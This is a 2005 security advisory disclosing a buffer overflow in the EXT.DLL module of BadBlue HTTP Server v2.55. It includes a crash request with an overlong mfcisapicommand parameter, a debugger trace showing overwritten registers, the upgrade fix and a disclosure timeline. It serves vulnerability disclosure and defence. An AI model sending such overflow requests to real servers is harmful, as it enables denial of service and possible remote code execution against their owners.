SIA International Security Advisory - Badblue HTTP Server, ext.dll buffer overflow * Release DAte: February 26, 2005 * Vendor: Working Resources Inc. http://www.badblue.com * Versions Affected: Confirmed under Badblue HTTP Server v2.55 * Severity: Critical (Remote Code execution) * Summary: "BadBlue is not only a server, it's a complete file sharing system that is simply easier and faster to use than anything else. Why? Because BadBlue lets you use a tool you already know well: a web browser." "In seconds, you can turn your PC into a powerful web server. You can easily share photos, music, videos, and much more. With its simple menu-driven interface and pop-up wizards to guide you through setup, there's no faster way to share files" * Technical Details: SIA has discovered a buffer overflow in EXT.DLL, a module that handles badblue http Requests. This buffer overflow triggers when an special crafted HTTP Request is created. Buffer overflow in EXT.DLL is triggered when a malicious http request that contains a long mfcisapicommand parameter, with more than 250 chars, is submitted. Some registers are overwritten so its possible to execute code or cause a denial of service shutting down the server. The Following request can be used to crash the remote server. GET /ext.dll?mfcisapicommand=AAA...[250 chars]...AAA&page=index.htx Windbg trace: (360.21c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=026bda14 ebx=01130478 ecx=41414141 edx=0113057d esi=41414141 edi=77e2b495 eip=10042004 esp=026bd8f4 ebp=026bdbe0 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206 *** WARNING: Unable to verify checksum for E:\BadBlue\PE\ext.dll *** ERROR: Symbol file could not be found. Defaulted to export symbols for E:\BadBlue\PE\ext.dll - ext!GetExtensionVersion+0x13f7: 10042004 8b3e mov edi,[esi] ds:0023:41414141=???????? Succesfully exploitation of this flaw could allow remote code execution with Administrator rigths. * Solution: Upgrade to the lastest available version. At this time, vendor provides version v2.6 that is available to download at http://www.badblue.com/bb98.exe * Credits: Andres Tarasco (atarasco _at_ sia.es) has discovered this vulnerability * Disclosure Timeline: December 2004 - Discovered December 20, 2004 - Initial Vendor Notification December 21, 2004 - Initial Vender Response January 3, 2005 - Vendor Patch released (v2.60) February 26, 2005 - Public Disclosure